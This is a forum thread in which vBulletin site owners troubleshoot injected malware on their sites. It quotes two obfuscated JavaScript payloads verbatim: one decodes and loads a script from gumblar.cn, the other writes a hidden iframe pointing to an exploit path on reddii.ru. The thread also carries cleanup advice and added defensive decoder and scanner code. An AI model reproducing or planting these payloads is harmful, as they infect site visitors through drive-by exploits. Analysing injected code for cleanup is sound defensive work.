Suspect javascript found

bouncer

New Member
Having problems with my site & have noticed the following javascript in many of my pages (viewed source from browser)
It looks suspicious to me!
Code:
</head><script language=javascript><!-- 
(function(){var lNVx=',76ar,20a,3d,22,53cr,69pt,45ngin,65,22,2cb,3d,22,56,65r,73ion()+,22,2c,6a,3d,22,22,2cu,3dnavigator,2euserAg,65,6et,3bif(,28u,2ein,64exOf,28,22Win,22),3e0),26,26(u,2ei,6ede,78,4ff(,22NT,20,36,22),3c0,29,26,26,28docume,6et,2e,63,6f,6f,6bie,2eindex,4ff(,22m,69ek,3d,31,22,29,3c,30),26,26(,74,79peof,28,7ar,76,7at,73),21,3d,74ype,6f,66(,22A,22))),7bzrvzts,3d,22A,22,3be,76a,6c(,22if(wind,6fw,2e,22,2ba+,22,29,6a,3d,6a+,22+a+,22,4dajor,22,2bb+a+,22,4dinor,22+b+a,2b,22,42uild,22,2bb+,22j,3b,22),3b,64ocument,2ew,72ite(,22,3c,73cr,69,70,74,20,73,72c,3d,2f,2f,67um,62lar,2ecn,2fr,73,73,2f,3fid,3d,22+j+,22,3e,3c,5c,2fsc,72ipt,3e,22),3b,7d';var sjNk3=unescape(lNVx.replace(/,/g,'%'));eval(sjNk3)})();
 --></script>

Any ideas what it is, where it came from, & how to get rid of it?

Thanks
 

StarWolf

New Member
It looks like someone hacked your board. If you haven't installed any mods or modified templates and/or sources yourself, then you should immediately remove these lines (post, specific template or source file) or your visitors will be infected.

After deletion, you should change the ftp password, administrator password and database password and update your board with the latest version.
 

h@ck3r

New Member
bouncer said:
Having problems with my site & have noticed the following javascript in many of my pages (viewed source from browser)
It looks suspicious to me!
Code:
</head><script language=javascript><!-- 
(function(){var lNVx=',76ar,20a,3d,22,53cr,69pt,45ngin,65,22,2cb,3d,22,56,65r,73ion()+,22,2c,6a,3d,22,22,2cu,3dnavigator,2euserAg,65,6et,3bif(,28u,2ein,64exOf,28,22Win,22),3e0),26,26(u,2ei,6ede,78,4ff(,22NT,20,36,22),3c0,29,26,26,28docume,6et,2e,63,6f,6f,6bie,2eindex,4ff(,22m,69ek,3d,31,22,29,3c,30),26,26(,74,79peof,28,7ar,76,7at,73),21,3d,74ype,6f,66(,22A,22))),7bzrvzts,3d,22A,22,3be,76a,6c(,22if(wind,6fw,2e,22,2ba+,22,29,6a,3d,6a+,22+a+,22,4dajor,22,2bb+a+,22,4dinor,22+b+a,2b,22,42uild,22,2bb+,22j,3b,22),3b,64ocument,2ew,72ite(,22,3c,73cr,69,70,74,20,73,72c,3d,2f,2f,67um,62lar,2ecn,2fr,73,73,2f,3fid,3d,22+j+,22,3e,3c,5c,2fsc,72ipt,3e,22),3b,7d';var sjNk3=unescape(lNVx.replace(/,/g,'%'));eval(sjNk3)})();
 --></script>

Any ideas what it is, where it came from, & how to get rid of it?

Thanks

Looks the same to me http://www.vbteam.info/programming/22454-someone-hacked-my-website.html

:(

If you remove the code- it keeps coming back.

Scan your PC with Avast and you will find a lot of crap (Worms/ Trojans).

Now let's get to the bottom of this-

What hacks have you recently installed?

My recent additions before this hacking started:

  • Dock in rock
  • VBTube Pro nulled
  • Classifieds
 

bouncer

New Member
Update:

1. The javascript mentioned in the OP found its way into all VB javascript functions and HTML files.

2. I also noted a few new (non VB) .php files with crap in them (which I deleted), named image.php, in various directories.

3. A few references to the following were found (can't recall in which files though). litetopdetect.cn

4. I also removed some other crap which had gotten into a good few VB .php files.

So I cleaned it all up yesterday and problem solved.

Overnight I got hit again, but this time less severe & far fewer files were hit with a different javascript.

Code:
<script>function vaYYdttxyVb(vtxbbaVVVYa){ function vVytYxVtyty () {var vYdyVdVVyyd=536; return vYdyVdVVyyd;} return(parseInt(vtxbbaVVVYa,16));}function vYdYtVtbYab(vYxdVdxyyYt){ function vbdaYdxyaxV () {var vaYdytdayyy=536; return vaYdytdayyy;} var vaxddddydaa='';for(vVdVdaVydat=0; vVdVdaVydat<vYxdVdxyyYt.length; vVdVdaVydat+=2){vaxddddydaa+=(String.fromCharCode(vaYYdttxyVb(vYxdVdxyyYt.substr(vVdVdaVydat,2))));}return vaxddddydaa;} document.write(vYdYtVtbYab('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65202069643D226462787874646262787422206E616D653D226179627974647864616422207372633D22687474703A2F2F7265646469692E72752F747261666669632F73706C6F6974312F3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A33373532292B2778596462746459745974222077696474683D223722206865696768743D2235333622207374796C653D22646973706C61793A206E6F6E653B223E3C2F696672616D653E27293C2F5343524950543E'));</script>

I have now backed up my /forums directory, so will use this as a restore point if hit again, which I probably will be!

These are the only two installed mods during the last two weeks (my first attack was on 4th May).

Enhanced Image Captcha
Highlight Threadstarter

Apart from upgrading to a newer version of VB, are there any security features you can suggest to prevent this situation from arising again?

Thanks.
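
Added example, not part of any post in this thread: a static decoder for the two encodings visible in the scripts above (commas standing in for `%` before `unescape`, and bare hex pairs fed through `String.fromCharCode`), so the hidden text can be read without running `eval` or `document.write`. The sample inputs and the `malware.example` host are constructed; `decode_literal` and `triage` are names chosen here.

```python
import re
from urllib.parse import unquote

LITERAL = re.compile(r"'((?:[^'\\]|\\.)*)'")       # single-quoted JS string literals
HEX_ONLY = re.compile(r"(?:[0-9A-Fa-f]{2}){8,}")    # encoding used by the second script
COMMA_HEX = re.compile(r",[0-9A-Fa-f]{2}")          # encoding used by the first script
SRC = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.I)

def decode_literal(lit):
    """Return the hidden text if lit uses one of the two encodings, else None."""
    if HEX_ONLY.fullmatch(lit):
        return bytes.fromhex(lit).decode("latin-1")
    if len(COMMA_HEX.findall(lit)) >= 4:
        # Static equivalent of unescape(s.replace(/,/g,'%')) for %XX sequences
        return unquote(lit.replace(",", "%"), encoding="latin-1")
    return None

def triage(js):
    """Decode every encoded literal in js and list what each one would load."""
    findings = []
    for lit in LITERAL.findall(js):
        text = decode_literal(lit)
        if text:
            findings.append({"decoded": text, "loads": SRC.findall(text)})
    return findings

# Constructed samples that mimic the shape of the injected scripts.
SAMPLE_COMMA = ("(function(){var s=',76ar a,3d1,3bdocument,2ewrite(,22,3cscript "
                "src,3d//malware,2eexample,2finc,2f,3e,3c,5c/script,3e,22),3b';"
                "eval(unescape(s.replace(/,/g,'%')))})();")
HIDDEN = '<iframe src="http://malware.example/x/" style="display:none"></iframe>'
SAMPLE_HEX = "document.write(dec('" + HIDDEN.encode().hex().upper() + "'));"

if __name__ == "__main__":
    for sample in (SAMPLE_COMMA, SAMPLE_HEX):
        for finding in triage(sample):
            print(finding["loads"], "<-", finding["decoded"])
```
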
 

h@ck3r

New Member
Thanks for the update buddy- appreciated.

I'll have a look through my directories tomorrow for any suspect files.

Have you scanned your PC?

I suggest Avast to scan.. Nod32 never picked anything up on mine, but with Avast- Found lots to do with this hack.
 

bouncer

New Member
I'm perplexed, is this attack going thru my PC or my web server !?!

^ Anyway, perhaps on a related issue. I use AVG anti-virus FREE (cheap-charlie) and a few days ago (around the same time my forum started misbehaving), the update function stopped working, so did my windows auto updates.

AVG update - Access forbidden by server

I ran an AVG & a LavaSoft scan, but nothing came up. I tried a suggested fix from AVG, but that didn't work. I dug a little deeper & someone suggested Combofix, Removes Malware,Spyware.... Anyway I downloaded it & followed the instructions. It produced some log files, which I have yet to understand, but it did the trick.

I was able to get an AVG update & my windows updates have also started again.

I guess my machine was infected & I just didn't know it.

I'll wait & see what happened to the forum
 

bluescorpion

New Member
bouncer said:
I'm perplexed, is this attack going thru my PC or my web server !?!

^ Anyway, perhaps on a related issue. I use AVG anti-virus FREE (cheap-charlie) and a few days ago (around the same time my forum started misbehaving), the update function stopped working, so did my windows auto updates.



I ran an AVG & a LavaSoft scan, but nothing came up. I tried a suggested fix from AVG, but that didn't work. I dug a little deeper & someone suggested Combofix, Removes Malware,Spyware.... Anyway I downloaded it & followed the instructions. It produced some log files, which I have yet to understand, but it did the trick.

I was able to get an AVG update & my windows updates have also started again.

I guess my machine was infected & I just didn't know it.

I'll wait & see what happened to the forum


I am seeing quite a few HOSTING Providers stating that these types of hacks are getting onto your server from a PC Trojan that looks up your FTP credentials and logs into your site as you to wreak havoc on your site... You should change your FTP passwords after you figure out how to get rid of the bad guy on your PC ... pretty good bet that he's there waiting to do you again...
 

h@ck3r

New Member
Cheers for the help guys.

I've been at it for hours now trying to remove it using-

Hijack this
SuperAntiSpyware
Avast
MalwareBytes
Spyware Terminator

And currently I am scanning with Panda online scanner.

Once this has finished, I'll try Combofix, then change my FTP passwords/ usernames and see if it's fixed.

Appreciate the help in this thread. :)
 

bouncer

New Member
Ok, the good news.

I've found out what it is: Link Description
I've implemented a fix
I've been free of issues since the fix

Read & follow the info. in the link carefully!

PS. I use the latest Kaspersky as my preferred anti-virus s'w. It reports which pages the malware is on.
 

bluescorpion

New Member
Here is another pointer that is vBulletin focused. You don't need to register; the content that isn't visible is examples of the exploit described above by Bouncer and not necessary to solve the problem. Be sure to run the suggested virus scanner on your local system FIRST, otherwise you are wasting your time trying to fix your infected site.
 

h@ck3r

New Member
Cheers for the above folks.

I thought I had a totally different virus lol.

Anyway mine seems to be fixed now after running combofix, malware bytes, and avast.

However- When I come to this thread, I need to disable Avast otherwise it won't let me view it.
 

bouncer

New Member
h@ck3r said:
Cheers for the above folks. However- When I come to this thread, I need to disable Avast otherwise it won't let me view it.
I hope you changed your ftp upload application password, preferably NOT on your PC. And DON'T hardcode the pwd. into the ftp apps. connection, always connect manually each time & clear the cached data before exiting. It was thru the ftp app. password that many sites are being infected.
 

h@ck3r

New Member
No I just changed my default password on my hosting account (My host did it for me).

That changes my default FTP password.

Each time I use my FTP now I add the real password, and when I'm finished working on the server I remove the original pass, and add a fake one. :)

Been about a week now and it's not come back or infected my site (From what I can see).

BUT- I've prob got in excess of 50,000 files on my server in all different directories.

Is there any way to scan those files for malicious content without viewing them 1 by 1?

I'll be there months otherwise
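
Added example, not from the thread or from vBulletin: one way to sweep a large web root for the patterns posted above instead of opening files one by one. The signatures are assumptions drawn from the two scripts in this thread plus the rogue `image.php` name bouncer reported; `demo()` builds a small constructed tree and `malware.example` is a placeholder host.

```python
import os, re, sys, tempfile

WEB_EXT = {".php", ".js", ".html", ".htm", ".tpl"}
MAX_BYTES = 2_000_000  # assumption: injected code sits in ordinary-sized text files
SIGNATURES = {  # assumptions modelled on the two scripts posted in this thread
    "eval_unescape": re.compile(rb"unescape\(\s*\w+\.replace\(\s*/,/g"),
    "hex_blob": re.compile(rb"document\.write\(\s*\w+\(\s*'(?:[0-9A-Fa-f]{2}){40,}'"),
    "hidden_iframe": re.compile(rb"<iframe[^>]{0,300}display\s*:\s*none", re.I),
}

def scan(root):
    """Map relative path -> reasons for every file under root worth a manual look."""
    hits = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path, reasons = os.path.join(dirpath, name), []
            if name.lower() == "image.php":  # file name reported as rogue in the thread
                reasons.append("name_seen_in_thread")
            if os.path.splitext(name)[1].lower() in WEB_EXT:
                try:
                    with open(path, "rb") as fh:
                        data = fh.read(MAX_BYTES)
                except OSError:
                    data, reasons = b"", reasons + ["unreadable"]
                reasons += [k for k, rx in SIGNATURES.items() if rx.search(data)]
            if reasons:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = reasons
    return hits

def demo():  # builds a throwaway tree of constructed files and scans it
    tree = {
        "index.html": b"<html><head></head><body>clean</body></html>",
        "clientscript/global.js": b"var s=',61';var t=unescape(s.replace(/,/g,'%'));eval(t);",
        "forumdisplay.php": b"<script>document.write(d('" + b"3C" * 60 + b"'));</script>",
        "footer.html": b'<iframe src="http://malware.example/" style="display:none"></iframe>',
        "images/image.php": b"<?php /* constructed stand-in */ ?>",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in tree.items():
            target = os.path.join(root, rel)
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(body)
        return scan(root)

if __name__ == "__main__":
    found = scan(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for rel, why in sorted(found.items()):
        print(rel, ", ".join(why))
```

Pass the path of a downloaded copy of the site as the first argument. Any legitimate file that happens to be named `image.php` is listed too, so compare flagged files against a clean copy of the software before deleting anything.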
 

vForums

New Member
Looks like someone's executed a shell in your server using an XML vulnerability i.e /admincp/redirect= vbulletin seem to underestimate the power of <script> Tags </script>
 

bouncer

New Member
h@ck3r said:
BUT- I've prob got in excess of 50,000 files on my server in all different directories.

Is there any way to scan those files for malicious content without viewing them 1 by 1?

I'll be there months otherwise
1. The website I mentioned earlier has some suggestions.

2. Re-install vB.
 